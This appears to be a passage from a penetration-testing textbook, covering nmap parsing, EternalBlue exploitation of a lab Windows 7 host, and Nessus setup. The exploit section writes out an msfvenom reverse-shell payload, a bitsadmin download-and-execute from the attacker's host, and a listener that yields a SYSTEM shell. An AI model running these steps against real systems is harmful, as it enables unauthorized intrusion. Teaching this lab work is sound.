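The scan output in Figure 5.2 is what a defender should turn into an inventory. The following is an added example (my code, not the book's) that parses Nmap's normal output format into per-host records, lists which hosts expose SMB (139/tcp or 445/tcp), the service the Nessus scan later in this chapter flags, and lists hosts whose ports were all filtered and therefore need the -PN rescan from step 4. The sample text is constructed after Figure 5.2; the hostname win7-lab and the function names are mine.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the format of nmap's normal output (modelled on Figure 5.2;
# not a real scan). One report line uses nmap's "hostname (ip)" form.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-13 15:14 EST
Nmap scan report for 192.168.1.1
Host is up (0.00019s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds
808/tcp open  ccproxy
902/tcp open  iss
912/tcp open  apex
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.1.2
Host is up (0.00033s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:E3:E5:DE (VMware)

Nmap scan report for win7-lab (192.168.1.129)
Host is up (0.00025s latency).
All 1000 scanned ports on 192.168.1.129 are filtered
MAC Address: 00:0C:29:C9:EF:96 (VMware)
"""


@dataclass
class Host:
    ip: str
    hostname: str = ""
    mac: str = ""
    vendor: str = ""
    up: bool = False
    all_filtered: bool = False      # every probed port filtered: likely a host firewall
    open_ports: dict = field(default_factory=dict)   # "445/tcp" -> "microsoft-ds"


REPORT_RE = re.compile(r"^Nmap scan report for (\S+)(?: \(([\d.]+)\))?$")
PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+(\S+)\s+(\S+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})(?: \((.*)\))?")


def parse_nmap_output(text: str) -> list:
    """Turn nmap normal output into a list of Host records, one per report block."""
    hosts, current = [], None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            name, ip = m.group(1), m.group(2)
            current = Host(ip=ip or name, hostname=name if ip else "")
            hosts.append(current)
            continue
        if current is None:
            continue                      # banner lines before the first report
        if line.startswith("Host is up"):
            current.up = True
        elif line.startswith("All ") and "are filtered" in line:
            current.all_filtered = True
        elif (m := PORT_RE.match(line)) and m.group(2) == "open":
            current.open_ports[m.group(1)] = m.group(3)
        elif m := MAC_RE.match(line):
            current.mac = m.group(1).upper()
            current.vendor = m.group(2) or ""
    return hosts


SMB_PORTS = {"139/tcp", "445/tcp"}


def hosts_exposing_smb(hosts: list) -> list:
    """IPs answering on SMB ports: the first place to check patch level."""
    return sorted(h.ip for h in hosts if SMB_PORTS & set(h.open_ports))


def hosts_needing_pn(hosts: list) -> list:
    """IPs whose ports were all filtered; rescan these with -PN rather than
    assuming they are unreachable."""
    return sorted(h.ip for h in hosts if h.all_filtered)


if __name__ == "__main__":
    inventory = parse_nmap_output(SAMPLE_NMAP_OUTPUT)
    for h in inventory:
        print(h.ip, h.hostname, h.mac, h.vendor, sorted(h.open_ports))
    print("SMB exposed:", hosts_exposing_smb(inventory))
    print("all filtered:", hosts_needing_pn(inventory))
```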


Determining the network size 


It is not difficult to figure out how big your network is. It will be a lot easier if you already have 
some networking experience. Let us walk through a few steps to figure out how big the network 
is and how many hosts we have. 


Determining the network size using Kali Linux 


We will determine the network size in Kali Linux in this tutorial. To do so, follow the given 
steps: 


1. Open the Terminal. 


2. Press Enter after typing the following command:
ifconfig | grep mask


Figure 5.4 is the output:


inet 192.168.1.128 netmask 255.255.255.0 broadcast 192.168.1.255
inet 127.0.0.1 netmask 255.0.0.0


Figure 5.4: ifconfig command_2


To go to your network configuration, you will need to scroll up and down. In Figure 5.4, the 
subnet mask is 255.255.255.0. If we do some subnetting math, we can figure out that this 
network might have somewhere between 1 and 254 hosts. 


What does establishing the network size have to do with penetration testing, you might wonder? 
The penetration tester can estimate the number of hosts on a network by determining the network 
size. When the number of networks in a data center or college campus is known, this can make a 
penetration test easier. 


Detecting vulnerable hosts


This section is rather self-explanatory. If you know someone who does not update their system daily, they are certainly vulnerable to the most recent security risks. As of right now, Windows 7 is extremely insecure, especially if the user has not installed any updates or service packs. Let us see a vulnerability in Windows 7 in the upcoming example.


Let us look at the steps: 


1. Scan the target for the services in use, as shown in Figure 5.5:


Figure 5.5: nmap command_3
OS detection, version detection, script scanning, and traceroute are all possible with this command.


2. Use Nessus to scan for vulnerabilities. (If you are running Nessus for the first time, please 
note that you will need to register Nessus first.) 


3. We provide the IP address of the host we are going to scan for vulnerabilities, as shown in Figure 5.6:


Figure 5.6: Nessus_1 


4. We are now ready to click Launch to begin our Nessus scan, as illustrated in Figure 5.7:


Figure 5.7: Nessus_2 


5. After the scan is completed, we must examine the report, as shown in Figure 5.8:


Figure 5.8: Nessus_3 


6. As you can see from our findings, there are various services that are vulnerable, as shown in Figure 5.9:


Figure 5.9: Nessus_4 


When you select one of them and look at the name of the plugin, you will see MS17-010. 
We will use this later to locate our exploit. 


7. Let us start looking for our exploit. Use the following command to start a fresh Metasploit console, and refer to Figure 5.10:
msfconsole


Figure 5.10: msfconsole command


is where you can get the Metasploit Framework. H. D. Moore created the Metasploit Framework in 2003 as an open-source attack framework. It is used to break into systems and gadgets for the purpose of testing. It contains information for penetration testers, IDS signature developers, and exploit researchers.


8. Type the following into the console to find our exploit:
search ms17


The result is shown in Figure 5.11: 


Figure 5.11: msfconsole command_2 
9. Complete the following commands:
• use exploit/windows/smb/ms17_010_eternalblue: This command sets the Metasploit Framework to use the exploit ms17_010_eternalblue.
• set RHOST 192.168.1.129: This command sets the remote host to the target you are exploiting.
• set PAYLOAD windows/x64/meterpreter/reverse_tcp: This command sets the payload to reverse_tcp so that we can connect back to the host after the exploit is successful.
• set LHOST 192.168.1.128: This command sets the local host, which is the Kali Linux host's IP address.
• exploit: This command launches the exploit in real time so you can see the details in action.


10. If you want to run a different payload, use the following command:
show payloads


The output of the commands we entered previously can be seen in Figure 5.12: 


Figure 5.12: msfconsole command_3 


Unfortunately, the exploit does not run correctly because it supports x64 targets only, and our target is x86. Now, we will use another tool to find an exploit for our target, the searchsploit tool, as shown in Figure 5.13:


Figure 5.13: searchsploit command


11. Enter the following command, and refer to Figure 5.14:
searchsploit ms17-010


Figure 5.14: searchsploit command_2


12. Before we proceed, we should make a copy of this file so that we keep access to the original source code. To keep things simple, we can rename it exploit.py, as shown in Figure 5.15. We will enter the following command to get the full path of the exploit:

searchsploit -p windows/remote/42031.py


Then, we will enter the following command to copy the exploit:
cp /usr/share/exploitdb/exploits/windows/remote/42031.py exploit.py


Figure 5.15: Copy command


13. We may now edit the Python file and check the supported targets, as shown in Figure 5.16:


Figure 5.16: Exploit file 


14. Now, we can try to run the exploit, as shown in Figure 5.17:


# python exploit.py
Traceback (most recent call last):
  File "exploit.py", line 2, in <module>
    from impacket import smb
ImportError: No module named impacket


Figure 5.17: exploit output


There is an error (no module named impacket), which means that the impacket package is not installed. So, we will run the following command to fix this error, as shown in Figure 5.18:
sudo python2 -m pip install impacket


Figure 5.18: Install impacket module


15. Now, we can try to run the exploit again, as shown in Figure 5.19:


Figure 5.19: Run exploit.py


The exploit seems to work correctly, but it needs a target IP, shellcode_file, and numGroomConn, where our target IP is 192.168.1.129, and we can create shellcode_file using the msfvenom tool, as shown in Figure 5.20:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.128 LPORT=4444 > shellcode


Figure 5.20: msfvenom command 


And numGroomConn is an optional parameter that, by default, has the value 13. It is used in 
the EternalBlue exploit script for the buffer overflow attack. If the exploit fails, but the 
target does not crash, then try increasing the numGroomConn value. 


Currently, we can try to run the exploit with the given parameters, as shown in Figure 5.21:


Figure 5.21: Exploit output


16. Although the script did not work in the end, the debugging methods were instructive. Now, we will go back to Step 11 and select another exploit, such as 42315.py, to try it.


17. Repeat Step 12. Now, we can open the exploit and enter a valid username and password for our target, as shown in Figure 5.22:


Figure 5.22: Exploit file


18. Now, we can try to run the exploit, as shown in Figure 5.23:


# python exploit.py
Traceback (most recent call last):
  File "exploit.py", line 3, in <module>
    from mysmb import MYSMB
ImportError: No module named mysmb


Figure 5.23: Run exploit file


There is an error (No module named mysmb), which means that the mysmb module is not installed. So, we will run the following command to fix this error (see Figure 5.24):
wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py


Figure 5.24: Install mysmb module


19. Try running the file again, and we get a different output, as shown in Figure 5.25:


# python exploit.py
exploit.py <ip> [pipe name]


Figure 5.25: Run exploit file


It looks like usage information now, which is a good sign. We need to plug in the IP address of our target and a pipe name as parameters.


20. Find the named pipe: Named pipes are a low-overhead technique for running processes to communicate with one another. Pipes are often presented as files to which other processes can attach. A scanner in Metasploit will detect any named pipes on a host. Open a new terminal, type msfconsole, and then search for the scanner, as shown in Figure 5.26:
msfconsole
search pipe


Figure 5.26: msfconsole command


The one we want is pipe_auditor. Load the module with the use command:
use auxiliary/scanner/smb/pipe_auditor


You should see the msf6 auxiliary(scanner/smb/pipe_auditor) > prompt. Now, we can look at the options, as shown in Figure 5.27:


Figure 5.27: msfconsole command_2
All we really need to do is specify the IP address of our target (192.168.1.129); see Figure 5.28:
msf6 auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 192.168.1.129
RHOSTS => 192.168.1.129
msf6 auxiliary(scanner/smb/pipe_auditor) > run

[*] 192.168.1.129: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Figure 5.28: msfconsole command_3


It looks like it found no named pipes.
21. Run the exploit file. We should be able to launch the exploit file at this point. Use the target's IP address, as shown in Figure 5.29:


exploit.py 192.168.1.129
Target OS: Windows 7 Ultimate 7601 Service Pack 1
Using named pipe: samr
Target is 32 bit
Got frag size: 0x8
GROOM_POOL_SIZE: 0x5026
BRIDE_TRANS_SIZE: 0xfc8
CONNECTION: 0x8698e708
SESSION: 0x960e3758
FLINK: 0x828cf050
InParam: 0x828c96dc
MID: 0x3603
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Done


Figure 5.29: Exploit output


22. So that was successful! We do not know whether the file was generated because it is on the system rather than on the SMB share. As a result, we need to change the exploit. We must first build a shell.exe file, as shown in Figure 5.30:


Figure 5.30: msfvenom command


Now, we can start the Apache server so the target can connect back to our machine to fetch the payload. Next, we will tweak the code to fit our needs.

sudo systemctl start apache2
Modify the code: Back in exploit.py, find the section of code near the bottom that looks like the one shown in Figure 5.31:


Figure 5.31: Modify exploit file


Here, we can see the code that is responsible for connecting to the target and creating the 
text file. We can also see an interesting-looking function called service_exec() which is 
commented out. That will connect to the target and issue a command to copy the 
previously created text file into a new text file named pwned_exec.txt on the c drive. We 
can use this function to grab our payload and execute it on the target. 


23. First, uncomment the function and replace everything after cmd /c with the following command:

bitsadmin /transfer pwn /download http://192.168.1.128/sc.exe C:\sc.exe
Background Intelligent Transfer Service (BITSAdmin) is a Windows command-line tool used to upload or download files. The /transfer switch initializes a transfer (with the name pwn in this case), and /download specifies that it is a download. Then, we enter the name of the remote file (being hosted on our machine) and the name of the local file once it is transferred.


Next, add another service_exec() call and have it execute the file we just transferred. The code will look like this:

service_exec(conn, r'cmd /c /sc.exe')

Finally, we can comment out the section that creates a text file because we really do not need it anymore. The final code should look like the one shown in Figure 5.32:


Figure 5.32: Final exploit file after modifying the code 


Now, all we have left to do is run the exploit.


Run the finished exploit: To complete the exploit, we need something to catch the shell once the payload executes. We can use the multi-purpose handler in Metasploit for this. In a new terminal, use the following commands:


msfconsole
use exploit/multi/handler


You should see the exploit(multi/handler) prompt. We just need to set the payload to match whatever we specified when we created the shellcode earlier, which in this case is a reverse TCP shell:

set payload windows/shell/reverse_tcp

Next, set the appropriate listening host:

set lhost 192.168.1.128

And the listening port:

set lport 9001


And we can start the handler:
run


The output of the commands we entered previously can be seen in Figure 5.33:


Figure 5.33: msfconsole commands


It will listen for any incoming connections, and if everything goes smoothly, we will get a shell session once our exploit completes.


Finally, we should have everything in place and ready to go. We can launch the exploit just like we did earlier in our test run from within the exploit directory, as shown in Figure 5.34:


python exploit.py 192.168.1.129


Figure 5.34: Run exploit


This time we should see different results. Ignore the errors, and if it does not work the first time, just try again. Once the exploit successfully completes, we should see a session open back on our listener, as shown in Figure 5.35:


Figure 5.35: msfconsole output


We can verify we have compromised the target with the whoami command, as shown in Figure 5.36:


C:\Windows\system32>whoami
whoami
nt authority\system


Figure 5.36: whoami command output


Congratulations! Over a wireless network, we were able to detect and exploit a susceptible host. 


Preventing against threats 


We must always be aware of how to defend ourselves against these threats and attacks. After 
that, we will go over how to defend ourselves against these attacks. 


Prevention identification of hosts 


Small and large enterprises should have a hardware firewall, such as the WatchGuard XTM or Cisco ASA, or a next-generation firewall such as FortiGate, Palo Alto, or Check Point, with custom rules to block services and ports that are not in use, to protect themselves from threats and dangers. To prevent unwanted access, services that are not in use should be disabled on the server or network device. Intrusion detection systems with SMS or e-mail alerting capabilities should be deployed. Protocols should be logged, and alerts should be flagged by the firewall.


How would you know if your organization has been hacked if the firewall or IDS is not being 
monitored? It is critical to monitor your network daily if you want to keep ahead of threats and 
problems. VLANs can be used to separate your networks. To keep the network safe from 
network viruses and compromise, each server, workstation, VoIP, and wireless device should 
have its own VLAN. 


Preventing others from determining your network size 


Any sensitive information, including network diagrams, passwords, logs, workstation and server information, and configuration settings, should always be encrypted when evaluating network size. Small and large enterprises can use a hardware firewall such as WatchGuard XTM or Cisco ASA to regulate traffic by blocking ICMP and only permitting traffic from trusted sources.


Protection of vulnerable hosts 


Install the latest security updates offered by your vendors to safeguard your computers and 
network devices from exploitation. When new operating systems and software updates become 
available, install them. If you run into problems while upgrading, contact your program vendor. 
Use the most secure Wi-Fi encryption, WPA2 or WPA3, which uses the AES encryption 
technique and a long password. On all your workstations and servers, run a real-time antivirus 
scanner with the most recent virus definitions. Staff members should receive security awareness 
training. 


Conclusion 


Wow! In this chapter, we accomplished three demonstrations! This chapter was a lot of fun and 
was also quite interesting. Let us look back at what you have learned so far. 


We addressed why it is critical to determine the number of live hosts while executing a network 
penetration test in this chapter. After that, we used Kali Linux to detect hosts on the network. 
Then, as a penetration tester, we demonstrated how to determine network size and why it is vital 
to know. We wrapped off the chapter by demonstrating how to use the Nessus vulnerability 
scanner to find vulnerabilities in Windows 7, as well as a list of possible mitigations. 


We will go over how to organize a vulnerability assessment, configure the Nessus vulnerability 
scanner, run the scanner, and patch vulnerabilities in the following chapter. Let us now get 
started on the upcoming chapter! 


Questions


1. Mention the most famous network mapping tools.

2. How do we determine the network size?

3. How do we detect vulnerable hosts in your network in detail?

4. What are the prevention methods to defend ourselves against attacks?


CHAPTER 6
Wireless Vulnerability Assessment


Introduction 


We spoke about how to get on the network and find out who is on it in the previous chapter. In 
this chapter, we will look at vulnerability assessments, which raises the question: what exactly is 
a vulnerability assessment? 


A vulnerability assessment, also known as vulnerability analysis, is the process through which a 
security professional uncovers, identifies, and categorizes potential security vulnerabilities 
(holes) in a computer system, network, or other electronic infrastructure. Vulnerability 
assessments can also be used to evaluate threats and propose an appropriate countermeasure. 
When conducting vulnerability assessments, most security experts follow a step-by-step 
procedure. The following is a typical vulnerability assessment: 


• Identifying and categorizing computer systems and networks
• Creating a list of the most critical services
• Identifying each service's possible security threats
• Developing a defense strategy to counter potential threats
• Finding measures to minimize or reduce risk in the event of an attack


If a person or organization discovers a vulnerability, they are liable for it and must notify the 
vendor. A zero-day vulnerability is one that is discovered as a high-level threat without the 
vendor being notified. When a vulnerability is not addressed or patched by the developer, a zero- 
day attack will be prevalent. This is well-known when a vendor’s device or software is no longer 
supported. 


If the threat is modest, the vendor will most likely wait until the next update to release a patch. It
all depends on the nature of the threat and what it is capable of. A vulnerability that allows remote
code execution or, worse, root or administrator rights without authorization should be patched as
soon as possible; however, this is not always the case. It depends on how the vendor handles
such a circumstance, and it is possible that the organization will not be able to afford it.


Vulnerability assessments are typically carried out by white hats or trained, ethical hackers;
however, black hats will occasionally utilize them for malicious purposes. They can perform
vulnerability assessments to learn more about what they can access through someone's network.
Using these same approaches to assess vulnerabilities, security experts can uncover gaps and provide
recommendations and countermeasures to prevent an attack.


Structure 


In this chapter, we will discuss the following topics: 


• Planning an assessment
• Setting up a vulnerability scanner
• Running a vulnerability scanner
• Running a Nessus vulnerability scan
• Generating reports
• Resolving vulnerabilities


Objectives 


In this chapter, you will learn how to plan out an assessment, the key components of an assessment,
and the step-by-step process of an assessment. You will be able to install Nessus, register it,
download plugins, and then run Nessus. You will be able to create a new policy and scan,
identify vulnerabilities, read the vulnerability details, and follow up with a solution to the
vulnerability.


Planning an assessment 


We need to start planning an assessment before we can execute one. We begin by asking 
ourselves a series of questions about the evaluation. Let us get started! 


How will we be spending our time and resources?


If you are going to conduct an assessment for an individual or a company, you will need an 
estimate of how long it will take to complete the task. It is also a good idea to know ahead of 
time what you will be using to complete the assessment. 


Do you have enough supporting evidence for your discoveries?


It is a good idea to double-check that you have adequate data to cover any findings you make 
throughout the vulnerability assessment. When you start generating reports, you need to know 
what each vulnerability is and how it operates. It is also a good idea to provide proof of concept. 


When a vulnerability is detected and identified, what is the best way to address the problem? 


This is a difficult question to answer because it is dependent on the severity of the threat. The 
most frequent things to do are to make sure you have the most recent updates, upgrade your 
software, turn off any background services that are not in use, and add any additional security 
features like complex passwords and two-factor authentication. Notify the vendor of the 
vulnerability. 


How can we improve the detection rate and minimize security threats?


Use commercial hardware firewalls with IDS and IPS monitoring capabilities: proactive scanners
that detect attacks as they happen. Within their hardware firewalls and unified threat management
systems, WatchGuard delivers strong security modules such as packet filtering, intrusion
prevention service, application control, Web blocker, gateway antivirus, spam blocker, and much
more. To minimize risk, make sure your software and hardware are always up to date.


An objective and a logical plan are required to conduct a good assessment. 


Components of a vulnerability assessment plan 


We will go through a few critical elements of a vulnerability assessment strategy. As an example, 
consider the following: 


• Primary objective:
  ◦ How is this objective handled?
  ◦ How will this objective be assessed?
  ◦ Who is involved in the assessment?
  ◦ Which patches are available on the vendor side?
  ◦ Identifying common vulnerabilities
  ◦ Summarize
• First objective:
  ◦ Identifies the issues
• Second objective:
  ◦ Provide a temporary or permanent solution
• Third, fourth, and so on:
  ◦ Depending on the situation, it may require additional objectives.


Planning the process of a vulnerability assessment 


We will look at an example of how to plan a vulnerability assessment in this section:

• Objectives:
  ◦ Are there any open networks available? If so, what are they used for?
• Criteria:
  ◦ What is the priority of this objective?
• Strategy:
  ◦ If there are unauthorized users on the network, can they cause damage to workstations or servers?
  ◦ Are they on a separate VLAN or subnet?
• Methods:
  ◦ What can we do to meet the objective?
• Time:
  ◦ Is there a deadline?
  ◦ When can we provide a solution?
• Results:
  ◦ Who will need to know about the results?
  ◦ How can we prevent future unauthorized user access?


This should give you a fair understanding of how to go about designing your own vulnerability
analysis. When providing service to an individual or a business, use this as a guide. After that,
we will set up a vulnerability scanner. Nessus is the vulnerability scanner we will be looking
at.


Before we begin setting up a vulnerability scanner, it is crucial to understand what a vulnerability
scanner is and why it is so important. Vulnerability scanners do exactly what their name says: a
vulnerability scanner is a program or software security tool that looks for flaws in computers, devices,
and networks. In most circumstances, it will immediately tell you whether you are facing low, medium, or
severe security dangers. From the perspective of a security specialist, this can be highly useful in
further analyzing what could potentially threaten an individual or company.


By exploiting a reported vulnerability, a black hat hacker who uses this tool might swiftly acquire
unauthorized access to confidential information or company data. On a corporate network,
the only way to protect against a vulnerability scanner is to divide each department into VLANs,
enforce strong group policies that prevent untrusted executables and installations, limit the use of
flash drives, and provide any form of protection against running unauthorized programs.
Employees should only run products that help them complete their tasks; unwanted websites can
swiftly be shut off for those users by enabling a URL blocker and adding security features.


It is crucial to know what a vulnerability scanner is. This is because this tool may be extremely 
useful in determining what might be a backdoor to your system or perhaps your entire network if 
a hardware firewall has a service or port open that should not have been switched on in the first 
place. Firewall and router default settings are excellent because they just work, right? Wrong! It 
is critical to turn off any unused services and to block any ports that are not in use, such as FTP, 
RDP, SSH, and Telnet. 


Within Kali Linux, we will be using the Nessus vulnerability scanner. Tenable Network Security 
created Nessus, a proprietary comprehensive vulnerability scanner. They sell both personal and 
commercial software licenses. For demos, we will use the personal version. 


One of the most widely used vulnerability scanners is Nessus. It is currently used by over 80,000 
organizations all around the world. Nessus is a tool that automatically detects known security 
flaws. One of the best features of Nessus is that it can be used as both a client and a server. It can 
be networked, allowing scans to be performed from any location. Microsoft Windows, Mac OS 
X, Linux, FreeBSD, Solaris, and IBM/AIX are all supported. For penetration testers, the 
reporting feature is quite useful. 


The following will be detected by Nessus: 


• Vulnerabilities that provide remote access
• Access to sensitive data on a system
• Misconfigured systems (missing security patches, open ports, and so on)
• Commonly used passwords, default passwords, and blank passwords
• Denial of service attacks using mangled packets
• PCI DSS audits


It will not only discover flaws but also give you information on the vulnerability and the severity 
of the danger. It will include connections to additional information and, if a security patch is 
available, links to download these security patches to help provide an extra layer of security. 


Setting up a vulnerability scanner 


Nessus will be the topic of this section. We will download and install Nessus, then register for an 
activation code, activate the program, and execute our first scan. 


Downloading Nessus 


Because Nessus is not preinstalled on Kali Linux, we will need to download and install it before 
we can begin searching for vulnerabilities. To get the most recent version of Nessus, go to the 
following website: https://www.tenable.com/downloads/nessus 


Select the download according to your operating system, as shown in Figure 6.1: 


Figure 6.1: Nessus download


Installing Nessus 


We will deploy the Nessus vulnerability scanner in this demonstration. The steps are as follows: 


1. Open a Terminal. 


2. Enter the following command and press Enter:
   sudo dpkg -i Nessus-8.15.2-debian6_amd64.deb   (for a 64-bit OS)
   sudo dpkg -i Nessus-8.15.2-debian6_i386.deb    (for a 32-bit OS)


Figure 6.2 is the output: 


Figure 6.2: Nessus Download_2


3. Press Enter after entering the following command: 
sudo systemctl start nessusd.service 


The Nessus vulnerability scanning utility will be launched with this command, as shown 
in Figure 6.3: 


Figure 6.3: Nessus start


4. Navigate to https://127.0.0.1:8834 in a Web browser. 


5. Click Proceed anyway when warned about the site's security certificate. You will be
presented with the screen shown in Figure 6.4:


Figure 6.4: Open Nessus in the Web browser 


6. You will be presented with the initialized screen for Nessus, as shown in Figure 6.5: 


Figure 6.5: Initialize Nessus


7. Obtain an activation code for the Nessus vulnerability scanner. Nessus Essentials and
Nessus Professional are two different versions of Tenable's Nessus vulnerability scanner.
Nessus Essentials is free, although it has a limited feature set compared to Nessus
Professional, which costs money. The following are some of the most significant
limitations of Nessus Essentials:
   • Scanning is limited to 16 IP addresses per scanner.
   • Compliance checks or live results are not available.
   • No ability to use the Nessus virtual appliance.
   Nessus Essentials will be used. Despite the fact that the software is free, it does require a
   valid activation code, which is detailed as follows.
8. Navigate to the Nessus Essentials product portal:
   https://www.tenable.com/products/nessus/nessus-essentials
9. Fill in your first name, last name, and e-mail address on the registration form, as shown in
Figure 6.6:


Figure 6.6: Tenable Nessus essentials product registration page


10. To finish registration, click the Register button, as shown in Figure 6.7: 


Figure 6.7: Completing registration on the Tenable Nessus essentials product registration page


11. Tenable will send you a confirmation e-mail once your registration is complete. Finally, 
you will be given the following message, as shown in Figure 6.8: 


Figure 6.8: The Nessus Essentials product registration page showing the result of successful registration


12. Check your e-mail for an activation code that looks something like D234-C7CB-04AF-
79A6-1555. The sender's address will be no-reply@tenable.com. If you do not see
the registration e-mail in your inbox, check your trash folder!

13. Activate the Nessus application: it is time to activate your Nessus installation now that
you have your activation code and have started the Nessus service.

14. Navigate to https://localhost:8834 using a Web browser on your Kali Linux operating
system. Note that the default port is 8834, not 443. (When you try to visit
the Nessus application's Web interface, you will probably get a warning because the
installation comes with a self-signed SSL certificate. Tenable gives you the option of
customizing the SSL certificate that your Nessus application uses.)

15. Select Nessus Essentials as the product version on the Welcome to Nessus screen, as
shown in Figure 6.9:


Figure 6.9: Selecting Nessus essentials as the Nessus product version


16. You can skip the Get an activation code screen because you already have the
activation code. Refer to Figure 6.10:


Figure 6.10: Selecting the skip button on the retrieve activation code screen


17. On the Register Nessus screen, enter the Activation Code you obtained during the 
registration procedure and click Continue. The mock activation code for this tutorial is 
D234-C7CB-04AF-79A6-1555, as shown in Figure 6.11: 


Figure 6.11: Entering the activation code into the Nessus application


18. When the Create a user account screen appears, enter a username and password, then 
click Submit. The Nessus program is accessed using the given login and password, as 
shown in Figure 6.12: 


Figure 6.12: Creating a user account for the Nessus application


19. After the scanner has finished initializing, which may take some time, click Sign In and 
enter the username and password for the user account you created earlier in this lesson. 
Refer to Figure 6.13: 


Figure 6.13: Displaying the username and password login screen


Fantastic work! Your Nessus vulnerability scanner program is now installed and activated! In the 
next part, you will set up Nessus to run a vulnerability scan on your local system. 


Running a Nessus vulnerability scan 


You have successfully installed Nessus. It is time to put the pedal to the metal and discover what 
this useful tool can do for you in terms of finding weaknesses! The rest of this section will walk 
you through configuring and running a scan on your Kali Linux system. 


If you are still on the Nessus application screen or are not already logged in, enter the username 
and password for the user account you created earlier in this guide. 


A welcome message may appear upon the first login, allowing you to rapidly configure a 
discovery scan, which locates networked devices. You may dismiss this notice because you are 
about to configure and run a custom scan, as shown in Figure 6.14: 


Figure 6.14: The Nessus application showing the close selection button highlighted


Configuring a scan can be done in a variety of ways. This tutorial focuses on the three-step
process described in the following sections:

1. Configure a scan policy
2. Configure a scan
3. Launch the scan


Configuring a Nessus vulnerability scan policy 


Scan policies are basically a set of scanning instructions. Scan policies tell the scanner what 
duties to complete and how to complete them. You can choose from several pre-configured scan 
policy templates or customize a complex scan. The scanning capabilities of Nessus are divided 
into three categories by Tenable: 


• Discovery scan: Targets an address space to report on live hosts and open ports.
• Vulnerability scan: Targets endpoints to assess them for known vulnerabilities.
• Compliance scan: Targets endpoints to assess endpoint configuration for compliance
with a particular standard (for example, Center for Internet Security (CIS)
benchmarks, Security Technical Implementation Guide (STIG), and so on).


Follow these steps to build and configure your scan policy.


1. Policies can be found under the Resources category in the menu on the left-hand side of 
the screen, as shown in Figure 6.15: 


Figure 6.15: Selecting policies from the Nessus menu

2. Choose New Policy from the menu in the upper right corner of the screen, as shown in
Figure 6.16:

Figure 6.16: Creating a new policy from the Nessus policies page


3. Select Basic Network Scan from the drop-down menu. Pre-configured settings for 
assessing your Kali Linux server for vulnerabilities are included in the Basic Network 
Scan option, as shown in Figure 6.17: 
Figure 6.17: Selecting the basic network scan from the Nessus policy templates page


Additional adjustable components appear after selecting a scan policy template. For the 
time being, leave each pre-configured setting in its default state, but feel free to 
experiment afterwards. 


4. Click the Save button after giving your scan policy a Name. Basic Network
Vulnerability Scan Policy is the name of the scan policy used in this tutorial, as shown
in Figure 6.18:

Figure 6.18: Entering the policy name and using pre-configured defaults on the Nessus Basic Network Vulnerability
scan policy page


Tenable's scanner requires administrative access to the target to run some vulnerability checks (a few of
which will be demonstrated in this tutorial). Executing a scan without credentials offers insight into
externally enumerable vulnerabilities, simulating the perspective of an attacker.


Configuring a Nessus vulnerability scan 


Configuring your scan is the next stage in the procedure. During this part of the process, you
select a scan policy and a target host, as described in the following steps.


1. From the menu on the left-hand side of the screen, select My Scans, as shown in Figure
6.19:

Figure 6.19: Selecting My Scans on the Nessus menu


2. In the upper right-hand corner of the screen, click the New Scan button, as shown in 
Figure 6.20: 


Figure 6.20: Creating a New Scan in Nessus 


3. Select the newly created Basic Network Vulnerability Scan from the User Defined 
tab, as shown in Figure 6.21: 


Figure 6.21: Choosing to create a User-Defined Nessus scan


4. Choose the scan policy you set up in the previous section. The Basic Network
Vulnerability Scan Policy from this lesson is displayed for selection, as shown in
Figure 6.22:

Figure 6.22: Selecting the Basic Network Vulnerability Scan Policy


5. Define your goal(s). In the Targets text entry box, type localhost to target your local Kali 
Linux host, as shown in Figure 6.23: 


Figure 6.23: Defining a vulnerability scan target


Multiple targets can be defined in a single scan by separating them with a comma. 
Specifying localhost, 10.10.10.10, for example, will target your localhost and the 
10.10.10.10 IP address. 
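The comma-separated target syntax above, together with the 16-IP limit of Nessus Essentials noted earlier, makes it worth checking a target list before the scan is saved. The following Python helper is an added example (not from the book or from Tenable); it assumes the Targets box also accepts CIDR blocks and hyphenated IP ranges, and it counts each hostname as one address without resolving it.

```python
"""Check a Nessus target list against the Nessus Essentials 16-address limit.

Added example, not code from the book or from Tenable. Assumptions: the
Targets box accepts a comma-separated mix of hostnames, single IPv4
addresses, CIDR blocks (10.10.10.0/29) and hyphenated ranges
(10.10.10.1-10.10.10.5); a hostname is counted as one address without a
DNS lookup.
"""
import ipaddress
import re

# Limit quoted in the chapter for Nessus Essentials.
ESSENTIALS_IP_LIMIT = 16

_HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def _parse_range(entry):
    """Return (start, end) for 'a.b.c.d-e.f.g.h', or None if not a range."""
    if "-" not in entry:
        return None
    left, right = entry.split("-", 1)
    try:
        start = ipaddress.ip_address(left.strip())
        end = ipaddress.ip_address(right.strip())
    except ValueError:
        return None  # a hyphenated hostname such as my-host, not a range
    if end < start:
        raise ValueError(f"range end precedes start: {entry}")
    return start, end


def expand_target(entry):
    """Expand one Targets entry into a list of address strings.

    CIDR blocks expand to their usable host addresses (all addresses for
    /31 and /32); hostnames are returned unchanged.
    """
    entry = entry.strip()
    if not entry:
        return []
    if "/" in entry:
        net = ipaddress.ip_network(entry, strict=False)
        ips = list(net) if net.num_addresses <= 2 else list(net.hosts())
        return [str(ip) for ip in ips]
    rng = _parse_range(entry)
    if rng is not None:
        start, end = rng
        return [str(ipaddress.ip_address(n)) for n in range(int(start), int(end) + 1)]
    try:
        return [str(ipaddress.ip_address(entry))]
    except ValueError:
        pass
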